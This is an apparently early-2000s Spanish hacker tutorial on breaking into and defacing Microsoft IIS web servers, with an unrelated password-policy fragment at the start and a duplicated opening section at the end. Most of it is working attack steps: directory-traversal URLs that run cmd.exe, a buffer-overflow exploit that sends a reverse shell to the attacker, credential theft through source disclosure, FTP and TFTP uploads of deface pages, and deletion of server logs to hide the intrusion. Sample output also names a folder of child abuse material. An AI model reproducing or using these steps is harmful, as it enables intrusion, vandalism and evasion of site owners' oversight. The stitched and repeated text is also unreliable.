administradores es ademas de la pol¡tica de passwords como en el ejemplo
numero 2, seria como dije arriba, pasarle a su sistema el john the ripper
por lo menos una vez por semana y avisarle a los usuarios sobre sus
passwords y que deben cambiarlos ya que ponen en peligro el sistema, y
si ellos no lo hacen lo hace el mismo administrador y le envias el
password antes de cambiarlo porsupuesto, pero esto se debe hacer
inmediatamente, ya que si alguien ya entro a el sistema que manejamos
quizas ya tenga el /etc/passwd y cambiar todos los passwords en un
sistema de 3000 usuarios es mas dificil no?
Hacking IIs Webservers por Pasos
1. Introduccion & Disclaimer:
Ke onda raza, escribire este simple manual, no por que no tenga nada mas que hacer
mas bien para todos los Newbies y que quieran aprender hacerle deface, etc.. a los
IIs servers ( Internet Information Server ) ya que el IIs es el webserver por defecto de los
NT , Win2k Server, etc. pero no siempre esos Os's traeran ese webserver unos traen
apache (win32) o Lotus Domino. etc. Bueno en este tutorial solo hablare de unas cuantas
vulnerabilidades. ( no todas las ke hay).
A. Disclaimer:
No soy y ni me hare responsable por lo que hagan con esta informacion en este tutorial.
Es solo para fines educacionales. :p
B. Podran distribuir este tutorial en otros sitios con que nomas no se altere el contenido
sin el consentimiento mio y menos cambiar los creditos, O ver otro manual iwal demasiado
parecido al mio. El credito es para IpMazter ipmaster@icestorm.com | www.securenterprise.org
bueno empezemos .!
2. Como hayar servers corriendo IIs webservers:
Pueden buscar cada sitio ke vean ke es lo ke ese site corre. ( no se los recomiendo duraran mucho)
o se pueden bajar un scanner como el Grabbb pa linux ke con solo poner un rango de ip's y el puerto
ke kieren hayar como por ejemplo:
[root@maximus ipmazter]# ./grabbb
grabbb 0.0.1 by scut of teso
usage: ./grabbb [options]
Entonces agarramos un rango de una sub-red la ke ustedes se les antoje.
Ok supongamos ke tienen unos cuantos sites pa ver ke ke onda! pos tenemos ke saber
que webserver corren esos sites podemos usar ( www.netcraft.com ) pa ke nos diga el Os
y el Webserver ke corre ese site ejemplo:
The Site www.victim.com is Running Microsoft-IIs/5.0 on Windows 2000
Eso fue facil y rapido :) pero hay mas maneras pa saber ke Webserver estan usando ese sitio.
Tambien podriamos usar Nmap para ( *.nix ) si es ke lo tienes en tu makina linux o desde tu shell
ke tengas. veamos : tienes ke ser r00t pa poder ver el Os del sistema operativo ke estas scaneando.
[root@maximux ipmazter] # nmap -v -sS -O www.victima.com
Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/)
Host (209.23.1.xxx) appears to be up ... good.
Initiating SYN Stealth Scan against ( 209.23.1.xxx)
Adding open port 80/tcp
Adding open port 443/tcp
Adding open port 1025/tcp
Adding open port 25/tcp
Adding open port 5631/tcp
Adding open port 1030/tcp
Adding open port 3389/tcp
Adding open port 445/tcp
Adding open port 135/tcp
Adding open port 21/tcp
The SYN Stealth Scan took 44 seconds to scan 1549 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled.
Interesting ports on (209.23.1.xxx) :
( The 1539 ports scanned but not shown below are in state: closed )
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http <--------- the one we need here open !
135/tcp open loc-srv
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open listen
1030/tcp open iad1
3389/tcp open msrdp
5631/tcp open pcanywheredata
Remote operating system guess: Windows NT4 / Win95 / Win98
TCP Sequence Prediction: Class=trivial time dependency
Difficulty=3 (Trivial joke)
Etc.. como veran ese OS es un NT4 y pos como webserver tiene el IIs 4.0
Tambien Netcat te puede dar informacion sobre los webservers de un sitio.
ejemplo:
c:\nc>nc -vv www.victima.com 80
www.victimsite.com [209.xx.xxx.xx] 80 (http) open
GET / HTTP/1.0
[CRLF] <--- ke le aplastes enter unas 2 veces.
[CRLF]
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Mon, 28 Jan 2002 00:31:46 GMT
Content-Type: text/html
Content-Length: 87
The parameter is incorrectsent 2, rcvd 224 : NOTSOCK
etc.. obtendran un resultado parecido si es ke es un IIs.
como podran ver nos dice ke es un IIs 5.0 el sitio ese.
O puedes crear un texto preconfigurado con informacion ke puede
ser redireccionada con el netcat pa ahorrarse uno mas tiempo.
Creamos un texto llamado iis.txt ke contenga estos comandos:
GET / HTTP/1.0
[CRLF]
[CRLF]
y redireccionarlo atraves de Netcat Ejem:
c:\nc>nc -vv www.victima.com 80 <\ iis.txt
Los resultados seran como en el ejemplo anterior!
Bueno ahora tenemos un IIs 5.0 al parecer... entonces ke hacemos? umm
hay que checar el sitio con varias vulnerabilidades como el " decode"
IIs 5.0 printer Overflow, Translate: f , masadc2.pl , etc..
solo esas fallas veremos en este tutorial. asi ke veamos:
Nos bajamos un decodecheck.pl ( un perl script) ke cheke si es vulnerable
el sitio ke keremos scanear , pero primero tendras ke tener un compilador
de perl pa poder usar el programita ese. te puedes ir a www.activestate.com
o bajalo de la web de www.securenterprise.org en la seccion de downloads y luego
free software. esta ya linkiado el download.ok continuemos.
chekemos el sitio con el programa del decodecheck.pl ke tenemos.
C:\Perl\bin>perl decodecheck.pl www.victim.com:80
Testing www.victim.com:80 : Vulnerable
Uyy! como podran darse cuenta hayamos un server vulnerable al decode :)
los programas ke kieras correr de perl en win32. ponlos en las carpetas
perl y luego en Bin y usalo en ms-dos como ahi podras ver.!
O tambien la forma facil de volada si es ke no tienen el programa ese
a la mano.. pongan el string mas facil y corton en su web address Ejem:
www.victima.com/scripts/..%255c../winnt/system32/cmd.exe/c+dir+c:\
enter y si les sale algo como a continuacion van bien hasta ahorita!
Traten de usar proxies es recomendable al menos ke estes en un cybercafe hoho!
podran hayar suficientes en www.cyberarmy.com/lists.
bueno espero y les salga algo como esto a continuacion:
Directory of c:\
01/15/02 11:17p DIR kid porn files
12/19/01 03:14p DIR dame
11/12/01 12:19p 656,018 Exchange Server Setup.log
11/12/01 11:16a DIR ExchSrvr
12/10/01 08:54a DIR INetPub
01/27/02 12:00a DIR InterScan
12/20/01 12:39p DIR InterScan eManager
01/27/02 08:51p DIR Ipmazter_was_here
11/12/01 11:06a 17,178 mpssetup.log
11/12/01 11:06a DIR MSP
11/14/01 08:28a DIR oracle
Ah ke bien ya tamos adentro, cheken por mas particiones en el server
puede ke no nomas sea C: sino d: o los 2 o hasta mas g: f: etc..!
Tambien podemos usar Netcat pa ke nos salga eso , haciendo lo mismo ke la ves
pasada creamos un texto llamado decode.txt y le ponemos la siguiente string:
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
[carriage return]
[carriage return]
Y esto mas o menos sera el resultado a la hora de redireccionarlo con Netcat:
c:\nc>nc -vv www.victim.com 80 <\ decode.txt
www.victim.com [195.23.43.xxx] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIs/5.0
Date: Mon, 15 June 2001 16:03:35 GMT
Content-type: application/octect-stream
Volume in drive C has no label.
Volume Serial Number is 8631-765F
Directory of c:\
01/15/02 11:17p DIR kid porn files
12/19/01 03:14p DIR dame
11/12/01 12:19p 656,018 Exchange Server Setup.log
11/12/01 11:16a DIR ExchSrvr
12/10/01 08:54a DIR INetPub
01/27/02 12:00a DIR InterScan
12/20/01 12:39p DIR InterScan eManager
01/27/02 08:51p DIR Ipmazter_was_here
11/12/01 11:06a 17,178 mpssetup.log
11/12/01 11:06a DIR MSP
11/14/01 08:28a DIR oracle
Ya ven ahi ta !! :)
Tambien pueden obtener algo parecido al ejemplo anterior y ejecutar comandos
a la ves tambien con el decodexecute2.pl ejem: ( tamos usandolo desde linux).
[root@maximus ipmazter]# perl -x decodexecute.pl www.victim.com:80 'dir'
Executing dir on 209.34.65.xxx:80
HTTP/1.1 200 OK
Server: Microsoft-IIs/4.0
Date: Mon, 23 May 2000 01:23:52 GMT
Content-Type: application/octet-stream
Volume in drive C has no label
Volume Serial Number is F984-772F
Directory of C:\Inetpub\scripts
12/10/01 08:54a DIR..
01/27/02 12:00a DIR...
2 file(s) 10 bytes
15,345,324 bytes free
Bueno parece ser ke podemos ya ejecutar comandos, ya lo ke hagan de ahi
es problema suyo , usen su imaginacio. :D
-----------------------------------------------------------------------------
Todo lo anterior fue con la falla del decode , ahora veremos la falla del
IIs 5.0 printer overflow. ( jill.c ) veamos ocupamos el exploit llamado jill.c
ke lo puedes bajar de la pagina de securenterprise bajo la seccion de exploits
Y jill.c se corren en *nix ya tengas una shell o tu makina con linux.
Aunke tambien hay una version de ese exploit para win32 llamado IIs5-Koei
que lo puedes bajar tambien en la misma seccion ke del jill.c ..Ocuparas el
Netcat tambien aki y aki si es de afuerzitas. ahorita veran porque..
Ahora vemos como usaremos la falla del printer overflow y usaremos primero
el exploit version del win32 llamado IIs5-Koei..
solo tienen ke poner la web del server IIs 5.0 ke kieren ver si es vulnerable
y enter, pero primero poner tu netcat en escucha en el puerto 7882 por ke
ese puerto te dice el programa ke uses. :
c:\nc>nc -v -v -L -p 7882
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 7882... <-- ahi ya esta en escucha en ese puerto.
si llega a ser vulnerable el sitio ese. te mandara una shella tu pc y veras
algo como esto Ejem:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
C:\WINNT\system32>whoami
whoami
[carriage return]
NT AUTHORITY\SYSTEM
Como pueden ver ya tienen acceso al server como NT Authority\system.
Ahora miraremos como se usa el jill.c bajo linux :D
compilamos el exploit y veremos el usage!..
[root@maximus ipmazter]#cc jill.c -o jill
[root@maximus ipmazter]# ./jill
iis5 remote .printer overflow.
dark spyrit <\dspyrit@beavuh.org> / beavuh labs.
usage: ./jill
Ok bueno el exploit asi se usa tienes ke poner a netcat (pa *nix) en escucha
en el puerto ke kieres ke este en escucha. aki usare el 2003.
[root@maximus ipmazter]#nc -vv -l -p 2003
listening on [any] 2003...
ok ya esta ahora ejecutar el exploit...!
[root@fbi.gov ipmazter]#./jill 209.victims.ip 80 200.your.ip.addr 2003
IIs5 remote .printer overflow.
dark spyrit <\dspyrit@beavuh.org> / beavuh labs.
Connecting...
Sent...
You may need to send a carriage on ur listener if the shell doesnt
appear ok ! <-- ese mensaje te saldra automaticamente ke le aplastes
enter unas 2 veces en donde tienes el listener pa ver si te da la shell.
si te sale algo asi ya pudistes!
[root@fbi.gov ipmazter]#nc -vv -l -p 2003
listening on [any] 2003...
connect to [209.xx.xxx.xxx] from etc [209.xx.xxx.xx] 1117
[ carriage return ]
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
C:\WINNT\system32>whoami
whoami
[carriage return]
NT AUTHORITY\SYSTEM
Bueno ya vemos ke si agarro y ya tamos adentro ahora ya tenemos acceso
como NT AUTHORITY\SYSTEM y ahi pueden ver hize un " whoami" pa ver ke pex.!
------------------------------------------------------------------------------
Ahora hablaremos de la vulnerabilidad translate: f , es explotada por otro
IIs 5,0 ISAPI.DLL, httpx.dll, ke implementa Web Distributed Authoring y
Versioning IIs 5.0. WebDav is a microsoft-backed standard ke especifica
como autores remotos pueden editar y manejar Web Server Content por http.
Aki podemos hacer otro texto preconfigurado usando netcat como lo hemos
hecho ya anteriormente.
GET /global.asa\ HTTP/1.0
Translate: f
[CRLF]
[CRLF]
y redirecciona el texto ke hagas atraves de netcat al site vulnerable,
el source code del global.asa aparecera en texto. llamemos el texto ke
redireccionaremos ( fvul.txt )
c:\nc>nc -vv www.victim.com 80 <\ fvul.txt
www.victim.com [209.23.54.xxx] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 28 Jan 2002 00:31:46 GMT
Content-Type: application/octect-stream
Content-Length: 2790
Etag: "3874fdf79dff:kio"
Last-Modified: Mon, 21 Jan 2002 09:30:46 GMT
Accept-Ranges: bytes
Cache-Control: no-cache
<\objectRUNAT=Server SCOPE=Session ID=fixit PROGID="secure.object\">
("ConnectionText") = "DSN=phone;UID=stalker;Password=fuckoff
("ConnectionText") = "DSN=Backend;UID=stalker;PWD=test;"
("LDAPServer") = "LDAP://ldap.secureco.com:389"
("LDAPUserID") = "cn=Admin"
("LDAPPwd") = "Password"
Como podran ver , hemos agarrado los passwds de multiples servers , incluyendo
un LDAP system. Ya hay un perl script ke te lo hara esto mas facil aun se llama
srcgrab.pl ( Srcgrab.pl exploits the Translate:f bug. la vulnerabilidad presente
en los IIs4.0 y 5.0 y Windows 2000 frontpage extensiones, hace ke un atacante
remoto vea el source code de las paginas .asp y .asa del server victima.
---------------------------------------------------------------------------------
Ahora hablaremos sobre la falla del msadc/rds. y esta sera la ultima de este
tutorial. hay un exploit llamado msadc2.pl ya listo en la red y lo puedes hayar
en securenterprise en la seccion de perl scripts. esta falla te deja ejecutar
comandos arbitrarios al webserver IIs 4.0. ahorita veremos un simple ejemplo
de un deface con el masdc2.pl a el server victima. si nos sale cmd/c !!
kiere decir ke ya la hicimos a lo mejor! el ejemplo sera en linux!
[root@fbi.gov ipmazter]# perl -x msadc2.pl -h www.victim.com
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c echo IpMazter Ownz Ur site > c:\inetpub\wwwroot\index.htm
(asumiendo index.htm es la pagina principal de www.victim.com )
como ven solo le hice un echo al index. lo mas facil.!
TIP: ahora no solo por ke con el decode o con cualkiera otro de estos diga
"vulnerable " wow! poss nel.. todavia hay ke ver si tiene write access el web
folder. :( . asi es como podemos saber . aki usare la falla del decode pa ke vean
ya ke es la mas kemada de todas :).. hehe.
www.victim.com/scripts/..etc..../c+copy+c:\winnt\system32\cmd.exe+cmd2.exe
asi de simple pa saber si tiene acceso de escritura. no tiene ke ser siempre
el folder de scripts , hay muchos mas. en cualkier parte de la red pueden ver las
demas strings.
www.victim.com/scripts/..etc..../c+copy+c:\winnt\system32\cmd.exe+cmd2.exe
ok aki de nuevo si te sale algo como esto kiere decir ke vas bien:..
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers.
(1) files copied.
:) bueno vamos muy bien.parace ke si tenemos acceso de escritura en el server.
si les sale algo como en ves de lo anterior y ven esto:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers.
(o) files copied <-- no acceso de escritura ya te chingastes mejor vete
a ver ke otro hayas :(
tambien podemos hacer este tambien o los 2 , etc.
www.victim.com/scripts/..etc.../c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd2.exe
si dice iwal ke arriba ke (1) files copied , perfecto!!
----------------------------------------------------------------------------------
Ahora trataremos de subir nuestro hack.html en este caso pa hacerle deface.
puedes usar tu ftp de tu pc ke ya trae por defecto , o bajarte un cliente de ftp
como ws ftp pro o ftp serv-u aunke ese esta mas bien pa cuando haces defaces a los
*nix. luego lo comentare en el siguiente texto de defacing linux , etc.
Aki muestro un ejemplo facil con el ftp por defecto de la pc de uno.
ojala ke tenga acceso anonimo y tenga un directorio con acceso de escritura
C:\>ftp
ftp> open
To www.victim.com
Connected to www.victim.com
220 home Microsoft FTP Service (Version 3.0).
User (www.victim.com:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password
Password:
230 Anonymous user logged in. <-- acceso anonimo perfecto
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
dwnload
iomega
kerner
LAserJ5L
napv2b7.exe
Netscape.exe
226 Transfer complete. <-muy bien!
ftp: 62 bytes received in 0.16Seconds 0.39Kbytes/sec.
ftp> put hack.html
200 PORT command successful. <-- si dice 550 hack.html acceso denegado , entonces usaremos otros metodos.
150 Opening ASCII mode data connection for 'hack.html'.
226 Transfer complete.
ftp: 1235 bytes received in 0.64Seconds 0.45Kbytes/sec.
ftp> put hack.jpg
200 PORT command successful.
150 Opening ASCII mode data connection for 'hack.jpg'.
226 Transfer complete.
ftp: 1300 bytes received in 0.15Seconds 0.35Kbytes/sec.
ftp> quit
221
Ahi como pudieron ver como subi el hack.html y la foto ke ira en el deface!
Ahora veremos con lo del decode donde jodidos esta nuestro .html
mayoria de veces uno lo hayara en c:\inetpub\ftproot , veamos:
Directory of c:\Inetpub
02/28/01 02:15p DIR .
02/28/01 02:15p DIR ..
05/04/01 10:46a DIR ftproot
05/04/01 11:36a DIR gophroot
03/03/02 03:26a DIR scripts
02/28/01 02:16p 722 site_definition.wst
03/03/02 02:37a DIR wwwroot
7 File(s) 722 bytes
ahora escalemos al dir de ftproot :D
Directory of c:\Inetpub\ftproot
05/04/01 10:46a DIR .
05/04/01 10:46a DIR ..
05/04/01 10:46a DIR dwnload
03/03/02 11:54a hack.html <-- ahi esta nuestro html =)
03/03/02 11:54a hack.jpg
11/30/00 06:03a DIR iomega
05/14/01 10:46a DIR kerner
11/30/00 06:03a DIR LAserJ5L
08/22/00 07:13a 1,696,777 napv2b7.exe
08/28/00 09:05a 20,002,801 Netscape.exe
10 File(s) 21,699,578 bytes
454,900,736 bytes free
ahora ke ya lo tenemos arriba en el server , primero debemos saber donde jodidos
esta la web ..
www.victim.com/scripts/..%255c../winnt/system32/cmd.exe?/c+set
y obetendremos algo como esto..:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=SERVER_SII
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=en-us
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=www.victim.com
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; StarBand Version 2.0)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=your.ip.address.hehe <- or the proxy ip.
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\DMI\win32\bin;C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem
PATH_TRANSLATED=C:\Inetpub\wwwroot\ <-------------ahi esta el dir. de la web :)
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
Nunca siempre estara donde mismo el directorio por defecto es el
c:\inetpub\wwwroot\ylaweb.html
ahora pueden ir a ese dir. y ver donde esta el index.html o el default.htm
pero muchas veces veran un monton de .html's .asp's etc.. htm's. y dices utta!!
cual de todas seran ingao !!muy facil! vete al www.sitio.com. ya ke estas ahi
calale con los nombres de las paginas mas kemadas ke hay
www.site.com/index.html <-- asi escribelo tu
www.site.com/index.htm
www.site.com/default.htm
www.site.com/default.asp
etc....
pero la ke se aparesca como ejem: www.site.com/index.htm entonces la web
se llama index.htm y como ya sabes donde esta pos dale gas rapidin.:)
puede ke los dir. de donde esta la web varee . por ejemplo en ves de estar en
c:\inetpub\wwwroot puede estar en d:\inetpub\web\keves\akinoesta\
etc.. hehe! por eso te servira un poco el comando del set. pa y mirar el
path_translated y te diga donde esta situada la web principal
Y si nomas no das una con hayarla puedes hacer un search por la web ejemplo:
www.victim.com/etc....etc.. cmd.exe?/c+dir+/S+c:\*.html
y te saldra algp parecido a esto..:
Directory of c:\Dell\Drivers\28693
07/30/99 11:22a 857 Setup.html
1 File(s) 857 bytes
Directory of c:\InetPub\WWWroot\samples
07/26/00 10:16a 1,548 index.html
1 File(s) 1,548 bytes
y saldran massss!! hehe. ahi tu te las ingenuas !
ok ahora ke ya sabemos ke se llama index.htm ok.. y ke esta en el dir. de
c:\inetpub\wwwroot\ pos es hora de copiar nuestro hack.html ahi :)
www.victim.com/scripts/..%255c../inetpub/scripts/cmd2.exe?/c+copy+c:\inetpub\ftproot\hack.html+c:\inetpub\wwwroot\index.html
si te sale solo el error de CGI esta bien ! si te sale algo de access denied pos
kiere decir ke no tiene acceso de escritura el web folder y te la has pelado :(
como pueden ver ahi copie mi hack.html de ftproot por ke ahi estaba y lo mande al
dir. de la web original del server. hagan los mismo con la foto!
ahora metete a www.site.com , dale refresh y si sale pos felicidades y si no pos
ya te jodistes! o algo anda mal. ve y checa de nuevo en ke podistes haber fallado.
Ahora supongamos ke no podistes subir por ftp. por ke no tenia acceso anonimo el
el ftp o si tenia pero no habia directorios con escritura y no podias hacer
uploads al server. :( o simplemente ni ftp tenian o lo tienen firewalled etc..
Usaremos tftp ( trivial file transfer protocol / es el puerto UDP 69)
ese puerto tambien puede ke este deshabilitado por el admin o este firewalled, etc
bueno supongamos ke no hagamos lo siguiente.. bajemonos el cliente de tftp
pueden hayarlo en mi web de securenterprise, bajo free software.
instalemonos en nuestra pc y configuremoslo. etc.. el comando seria asi. ejem:
www.victim.com/...etc.../inetpub/scripts/cmd2.exe?/c+tftp+-i+Your.Ip.Adrres.+GET+hack.html+c:\inetpub\wwwroot\index.html
Ya ves lo subimos por tftp y lo copeamos en el dir. domde kieras o en ese. ahi tu
luego lo acomodas si lo pones en otro folder.
Ahora si asi tampoco se llegara a poder ingaoo!! pos usaremos el echo command
es muy facil y simple. mayoria de gente webas lo usa! hehe
POdemos calar si podemos hacerle echo al index , y esto como prueba:
www.victim.com/...etc.../inetpub/scripts/cmd2.exe?/c+echo>+>c:\inetpub\wwwroot\hoho.html
ahi esta el comando de prueba. si no algo de acceso denegado o otra mensada vas
bien, y vete si kieres a www.site.com/hoho.html y veras ke dira " Echo is on"
kiere decir ke de seguro podremos hacerle echo al index.html :)
www.victim.com/...etc../inetpub/scripts/cmd2.exe?/c+echo+
Hacked!
defaced By
by
IpMazter
"+>c:\inetpub\wwwroot\index.html
como vemos en ese comando de echo le meti codigo html pa ke se vea mejor aun
el deface con el comando del echo. :)
O uno simple nomas www.site.com/..etc../inetpub/scripts/cmd2.exe?/c+echo+IpMazter hacked you+>c:\inetpub\wwwroot\index.html
y ya vayanse a www.site.com y refresh y ya veran!!el simple deface . bueno es todo
por ahorita sobre defacing IIs servers ( Winblowz) hehe. ahora borremos LOGS!!
Ok mayoria de logs los hayaras en :
www.victim.com..etc.,,,/c+dir+c:\winnt\system32\logfiles
or
www.victim.com..etc../c+dir+c:\winnt\system32\logfiles\w3svc1
ahi los veras tu.. estan asi de esta manera :
in020321.log or ex020321.log etc..
in020321.log = year 2002 the 03 for march the date 21 :)
Un simple ejemplo de como se ve :
www.victim.com..etc../c+dir+c:\winnt\system32\logfiles\w3svc1
Directory of c:\winnt\system32\logfiles\w3svc1
02-03-21 01:48p DIR .
02-03-21 01:48p DIR ..
00-09-05 12:18a 423,909 in000904.log
00-09-06 12:00a 571,107 in000905.log
00-09-07 12:00a 771,947 in000906.log
00-09-07 03:49p 196,608 in000907.log
00-09-09 12:00a 474,393 in000908.log
00-09-10 12:01a 1,114,833 in000909.log
00-09-11 12:00a 455,745 in000910.log
00-09-12 07:00a 360,205 in000911.log
ahi tan los logs!! uyy a borrar solo los ke creemos ke debemos borarr
TIP: varias veces no podras el del dia mismo ke estas en el sistema,
pero borra el de ayer si kieres etc.. pa ke veas si puedes borrarlos.
y ya al dia siguiente entra y borralo. el del dia ke estuvistes haciendo
el desmadre si es ke el admin. no lo parcho ya! de inmediato. etc..
cuando no puedas veras algo como asi ejem:
CGI Error
The specified CGI application misbehaved by not etc,,,,
c:\winnt\system32\logfiles\w3svc1\in020321.log
The process cannot access the file because
it is being used by another process.
utts!! :( ni pex hasta ke pegue la 12am pa borrarlo hehe
o si traias proxy ke te valga de borrarlos.
ahora aki ta el comando pa borarr los logs :
www.victim.com/...etc../c+del+c:\winnt\system32\logfiles\w3svc1\in020320.log
enter y enga!! ya se borro .
Ahora ke ya le haygas hecho deface ahora mandalo a archivar claro ke no sea
un redefacedments por ke se ve lame! lo archivas en defaced.alldas.org
email= defaced@alldas.org o a www.zone-h.com ahi veras como se mandan ahi
pa archivarlos :)
Bueno ya me harte aki hay varios comandos pa ke se diviertan les puede servir
de util en algo kien sabe :
--------------------------------------------------------------------------
www.victim.com/...etc.../winnt/system32/net.exe?view+ /domain
www.victim.com/...etc../winnt/system32/net.exe?view
www.victim.com/..etc../winnt/system32/tracert.exe?IP
www.vicitm.com/..etc../winnt/system32/ping.exe?IP
www.victim.com/..etc......./c+md+c:\IpMazter_was_here -- create a directory
www.victim.com/..etc......./c+copy+c:\loko.txt+c:\users\texts -- copys loko.txt to that directory
www.victim.com/..etc......./c+type+c:\loko.txt -- see whats inside O_O
www.victim.com/..etc......./c+del+c:\loko.txt -- deleting
www.victim.com/..etc......./c+copy+c:\loko.txt and then www.victim.com/scripts/loko.txt
hay mas maneras de hacer un download:)
Bueno aki les mando unos links etc,, y las tools ke se usaron aki no todas casi
nmap: www.insecure.org/nmap
netcat: www.securenterprise.org/downloads/tools/nc11.nt.zip
netcat for linux: www.securenterprise.org/downloads/tools/nc110.tar
decodecheck.pl: www.securenterprise.org/downloads/perl/decodecheck.pl
msadc2.pl : www.securenterprise.org/downloads/perl/msadc2.pl
srcgrab.pl: www.securenterprise.org/downloads/perl/srcgrab.pl
jill.c : www.securenterprise.org/downloads/exploits/jill.c
decodexecute.pl : www.securenterprise.org/downloads/exploits/sensedecode.tgz
Ke onda raza, escribire este simple manual, no por que no tenga nada mas que hacer
mas bien para todos los Newbies y que quieran aprender hacerle deface, etc.. a los
IIs servers ( Internet Information Server ) ya que el IIs es el webserver por defecto de los
NT , Win2k Server, etc. pero no siempre esos Os's traeran ese webserver unos traen
apache (win32) o Lotus Domino. etc. Bueno en este tutorial solo hablare de unas cuantas
vulnerabilidades. ( no todas las ke hay).
A. Disclaimer:
No soy y ni me hare responsable por lo que hagan con esta informacion en este tutorial.
Es solo para fines educacionales. :p
B. Podran distribuir este tutorial en otros sitios con que nomas no se altere el contenido
sin el consentimiento mio y menos cambiar los creditos, O ver otro manual iwal demasiado
parecido al mio. El credito es para IpMazter ipmaster@icestorm.com | www.securenterprise.org
bueno empezemos .!
2. Como hayar servers corriendo IIs webservers:
Pueden buscar cada sitio ke vean ke es lo ke ese site corre. ( no se los recomiendo duraran mucho)
o se pueden bajar un scanner como el Grabbb pa linux ke con solo poner un rango de ip's y el puerto
ke kieren hayar como por ejemplo:
[root@maximus ipmazter]# ./grabbb
grabbb 0.0.1 by scut of teso
usage: ./grabbb [options]
Entonces agarramos un rango de una sub-red la ke ustedes se les antoje.
Ok supongamos ke tienen unos cuantos sites pa ver ke ke onda! pos tenemos ke saber
que webserver corren esos sites podemos usar ( www.netcraft.com ) pa ke nos diga el Os
y el Webserver ke corre ese site ejemplo:
The Site www.victim.com is Running Microsoft-IIs/5.0 on Windows 2000
Eso fue facil y rapido :) pero hay mas maneras pa saber ke Webserver estan usando ese sitio.
Tambien podriamos usar Nmap para ( *.nix ) si es ke lo tienes en tu makina linux o desde tu shell
ke tengas. veamos : tienes ke ser r00t pa poder ver el Os del sistema operativo ke estas scaneando.
[root@maximux ipmazter] # nmap -v -sS -O www.victima.com
Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/)
Host (209.23.1.xxx) appears to be up ... good.
Initiating SYN Stealth Scan against ( 209.23.1.xxx)
Adding open port 80/tcp
Adding open port 443/tcp
Adding open port 1025/tcp
Adding open port 25/tcp
Adding open port 5631/tcp
Adding open port 1030/tcp
Adding open port 3389/tcp
Adding open port 445/tcp
Adding open port 135/tcp
Adding open port 21/tcp
The SYN Stealth Scan took 44 seconds to scan 1549 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled.
Interesting ports on (209.23.1.xxx) :
( The 1539 ports scanned but not shown below are in state: closed )
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http <--------- the one we need here open !
135/tcp open loc-srv
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open listen
1030/tcp open iad1
3389/tcp open msrdp
5631/tcp open pcanywheredata
Remote operating system guess: Windows NT4 / Win95 / Win98
TCP Sequence Prediction: Class=trivial time dependency
Difficulty=3 (Trivial joke)
Etc.. como veran ese OS es un NT4 y pos como webserver tiene el IIs 4.0
Tambien Netcat te puede dar informacion sobre los webservers de un sitio.
ejemplo:
c:\nc>nc -vv www.victima.com 80
www.victimsite.com [209.xx.xxx.xx] 80 (http) open
GET / HTTP/1.0
[CRLF] <--- ke le aplastes enter unas 2 veces.
[CRLF]
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Mon, 28 Jan 2002 00:31:46 GMT
Content-Type: text/html
Content-Length: 87
The parameter is incorrectsent 2, rcvd 224 : NOTSOCK
etc.. obtendran un resultado parecido si es ke es un IIs.
como podran ver nos dice ke es un IIs 5.0 el sitio ese.
O puedes crear un texto preconfigurado con informacion ke puede
ser redireccionada con el netcat pa ahorrarse uno mas tiempo.
Creamos un texto llamado iis.txt ke contenga estos comandos:
GET / HTTP/1.0
[CRLF]
[CRLF]
y redireccionarlo atraves de Netcat Ejem:
c:\nc>nc -vv www.victima.com 80 <\ iis.txt
Los resultados seran como en el ejemplo anterior!
Bueno ahora tenemos un IIs 5.0 al parecer... entonces ke hacemos? umm
hay que checar el sitio con varias vulnerabilidades como el " decode"
IIs 5.0 printer Overflow, Translate: f , masadc2.pl , etc..
solo esas fallas veremos en este tutorial. asi ke veamos:
Nos bajamos un decodecheck.pl ( un perl script) ke cheke si es vulnerable
el sitio ke keremos scanear , pero primero tendras ke tener un compilador
de perl pa poder usar el programita ese. te puedes ir a www.activestate.com
o bajalo de la web de www.securenterprise.org en la seccion de downloads y luego
free software. esta ya linkiado el download.ok continuemos.
chekemos el sitio con el programa del decodecheck.pl ke tenemos.
C:\Perl\bin>perl decodecheck.pl www.victim.com:80
Testing www.victim.com:80 : Vulnerable
Uyy! como podran darse cuenta hayamos un server vulnerable al decode :)
los programas ke kieras correr de perl en win32. ponlos en las carpetas
